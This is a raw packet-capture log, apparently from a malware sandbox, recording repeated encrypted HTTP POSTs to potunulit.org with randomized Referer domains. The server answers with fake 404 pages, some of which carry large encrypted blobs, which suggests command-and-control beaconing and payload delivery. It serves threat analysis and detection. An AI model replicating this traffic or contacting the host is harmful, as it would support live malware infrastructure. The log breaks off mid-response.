Jan 25, 2023 09:28:12.559402943 CET	804	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PaSUQmFCXQiZ62bGa4o49xj0GsuzztoRdgziCG3KHu0xLUxRRUQmPHUvnUMTX3qcViCUiEHrHOU8I3UFky32DQn8Sfndb09rBhpkOSnLm8aMTnUtcOP2ZuWejbmvZdI8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa2520a609b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Jan 25, 2023 09:28:12.659390926 CET	804	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fedface.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: potunulit.org
Jan 25, 2023 09:28:12.659440994 CET	805	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 a0 e9 41 f5 Data Ascii: HO# *R.%]gmjC[jp_S61oJf=B!bOA=6?wm^@C5d #R:1;\gBzM0ncHS'GhKrz+n4`AL9TF)K3ymr0c@
Jan 25, 2023 09:28:12.739047050 CET	806	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgR2wOy0u9tVXVWMgJqVmojQFe7TPptd7QLwjsfNsgbNWXbSiBtdDuk8K4NHbezpdhqRLODa6YKDfw1lHobbEO%2B5VbPdr5SiV5bk6fs8Qu8%2FU9RSVpliQu%2BYDoXYjc6j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa2532c3d9b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 37 61 37 33 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 90 eb 68 9f 89 74 7e f6 25 24 85 3a f9 b7 59 f9 62 25 fa d8 0d 89 b4 f0 f1 91 66 7b bf 47 5f 39 f9 de 64 4f 7a 6f 3b 4e 82 98 d3 36 d5 45 3d f4 19 00 51 75 34 16 51 22 3b a5 92 d7 d8 ce b7 49 00 7e ae ac c3 86 21 5f 36 f8 37 33 f2 25 75 da ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 ba aa 8f 74 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e d7 f6 ff 78 d7 d5 d9 c4 0d 13 13 89 66 e1 92 24 18 4f c5 03 11 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ba 74 94 be 21 51 61 46 d0 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d eb 6b e5 0e c0 eb 7e 71 eb f0 74 18 38 b7 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f bb 93 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 83 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 65 fa de 8e 82 11 e8 e4 1f cc a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 fc ab fa 1d d4 ec 69 91 9c 1d 0f f1 2c c8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 9c 95 8b 8b e1 12 fb d5 9c a6 c3 e0 2b 63 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 7a73`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGht~%$:Yb%f{G_9dOzo;N6E=Qu4Q";I~!_673%up"XJ3Ob>!ZC:>tSSQ{~xf$Oa~i~]DzN,t!QaF5\|(kJk?a]V4l3l)\|k~qt8JO;yLuVW;*r#g1er+Lc1<'iFHU=h~U@Wd{9f(B@w=fd3Dw)pKeNTUo)2([>T~pWi,[}JPmC+cz(Fzk7 RH:M?~Mpvn%.5_)CCUb:@3%}/
Jan 25, 2023 09:28:20.537008047 CET	1556	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pghirnwb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: potunulit.org
Jan 25, 2023 09:28:20.537075996 CET	1557	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 bb 8a 14 62 cc d6 4f 96 91 a9 13 bd Data Ascii: HO# *R.%]gmjC[jp_S61oJf=B!bO=<UHt,^u,cT+{2xox]_aT O7f,4rG;OXz6n7^g%vB,6]Y3
Jan 25, 2023 09:28:20.662880898 CET	1558	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7uMaJBPHeyY9GKg%2Fg7YkyxACawcmVOgSR1WzbqjvIp0VD1g6PxbHV%2F2z01onKr2ssIMLk3cX3zkGYxEAo397a6ExuyQnpXgUIlpXT69iDEmPWT1xsCJtahl8g1ux4ci"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa2846af69b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Jan 25, 2023 09:28:20.819053888 CET	1558	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hkrpyqspb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 284 Host: potunulit.org
Jan 25, 2023 09:28:20.819142103 CET	1558	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b8 8a 14 62 cd d6 4f 96 9f e0 3d f6 Data Ascii: HO# *R.%]gmjC[jp_S61oJf=B!bO=zZKY;w:{9!1LS/9Rs'W0]\|Lyn$7Wlw=iVaC&DAEZ]<+#9f(=i'ge9
Jan 25, 2023 09:28:20.897762060 CET	1560	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mFqif1qzqdphc7%2Fsagwlbzd3Nj4Ho3wUo73DOvIpy79Q%2BA4%2F9pfoWLsJosBeXtKzOkSROVVu9nklvYlEoJ7MN1FfVM%2FRrd2l41ebpHIkmeBkw7JujOYFwB%2BWk8sIn4c7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa2862dfa9b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 35 62 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 45 f9 be 81 5c 66 a8 e8 f0 36 53 24 2c a5 8f e7 b7 37 3d c6 e6 9b 62 ee 24 83 a6 65 03 55 89 27 15 58 4a 51 ed 7d ed 50 70 4c 7f 28 8d 57 eb ea d2 40 02 6b a6 04 87 3c ee b7 5a c9 0e dc 61 57 d5 6c 7d b2 16 94 f7 41 be f3 79 4f 23 37 a3 c4 29 35 5b a5 cc 40 e2 5e 61 26 01 56 cf 43 b1 4e a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f2 ff 8a f3 9a b8 c4 0d 13 13 bf 1e e1 92 c4 08 4d c4 08 a0 c2 a1 61 d0 cb f5 69 4f 3a 17 7e 5f af 9a ce a0 c9 a0 c1 a9 dd 7a 0d 50 5b 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3e 7c 88 28 c8 48 6e a1 c0 4a 9a 03 fd ec 9e 7a 42 ac 87 2b bd 61 3f 9b 44 bf 44 34 bd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 48 7f 17 4c 25 56 ad f3 57 fb 1c b9 42 53 ce 23 b2 75 0e 31 79 92 90 f7 df 09 f4 e7 ea 3f 4c 80 d0 92 c0 13 ff 0d bb d6 3f f0 29 27 c8 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 d7 bf 6e 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 27 28 66 91 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 04 85 f2 5b 1e 44 ab 1e 26 d3 04 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f da 89 d9 b0 99 c7 8c 8a cd d6 7f 74 79 e2 78 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f ec 1b 8a 7a 8f f6 7d e3 cd c0 d9 37 00 64 f6 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 46 d3 0d ca 82 0f 13 2e 9f 28 cc ec 35 6c d6 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 6e d8 cb e4 ae a7 a1 33 f1 34 da a9 c3 68 Data Ascii: 15be`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG*E\f6S$,7=b$eU'XJQ}PpL(W@k<ZaWl}AyO#7)5[@^a&VCN:V?#BSSR+{2DMaiO:~_zP[,'Qa>\|(HnJzB+a?DD4yl#l)l~qxJO;yHL%VWBS#u1y?L?)'i3FHU=hU@n9&(B@w'(fd0QpKk^NTUc)[D&WL\h)^cu{tyxCbzk/v\Fz}7d RH:Mc`F.(5l_)CCUbX:n34h
Jan 25, 2023 09:28:23.652717113 CET	3280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jwoitvech.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: potunulit.org
Jan 25, 2023 09:28:23.652717113 CET	3280	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 b8 8a 14 62 cc d6 4f 96 f7 ad 29 d9 Data Ascii: HO# *R.%]gmjC[jp_S61oJf=B!bO)l//Cwdp;5;dv=OTM>u19E39b`Q#xE^?\|30:$y"%prob4adkj5@X
Jan 25, 2023 09:28:23.730667114 CET	3281	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JBK5aG5%2BhecL%2F6fMFpTYTUHGnP1aX6gT1rKVvZ52faPxpehMI84k2wf5ujtEZHugvAzglzmYi7LSKdQbjkTYsffV6BE9zhKiHapbMS8O8NbNXPNvOlv4L2F8QKiiQaBk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa297dcd19b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Jan 25, 2023 09:28:23.928066015 CET	3282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fedbh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: potunulit.org
Jan 25, 2023 09:28:23.928066015 CET	3282	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b9 8a 14 62 cd d6 4f 96 8a fd 0b db Data Ascii: HO# R.%]gmjC[jp_S61oJf=B!bO+3vFNfiG1"1o{/(x>M?^%J4UJK(q> rn1q#@pODh09hJ>~sao(gZ
Jan 25, 2023 09:28:24.007177114 CET	3283	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dIb%2FbzBntbzOkZhS061kRh6WZX7x0NSVVdR89OCmd0nwEJxIud0ucEpvreMYV8tJe7z6ZG%2FLYAqwfB5X1Hjj%2B0G0tiSl4H4DYsPnHQb9vUa5W70AmL6Ds5MIzxnGdcqo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa2999fd69b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Jan 25, 2023 09:28:24.350869894 CET	3284	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fyugji.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 152 Host: potunulit.org
Jan 25, 2023 09:28:24.350869894 CET	3284	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 be 8a 14 62 cd d6 4f 96 b9 c5 5f aa Data Ascii: HO# *R.%]gmjC[jp_S61oJf=B!bO_!K !k&x353Wc4rgIv6qE
Jan 25, 2023 09:28:24.433986902 CET	3285	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uc9nXYF1fmW%2Bagssg3q%2BTFkHnGyG6xXPS%2Bu1VDdcQ7JP4CYuoLuwjAjY%2BoX0XADjyHIyL4EBCfE06sNSpp3Rd7QKWR9Oh5YPP0ukKVvyqIB4UrTBLysCpLCWDyuk5gXX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa29c3c5a9b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 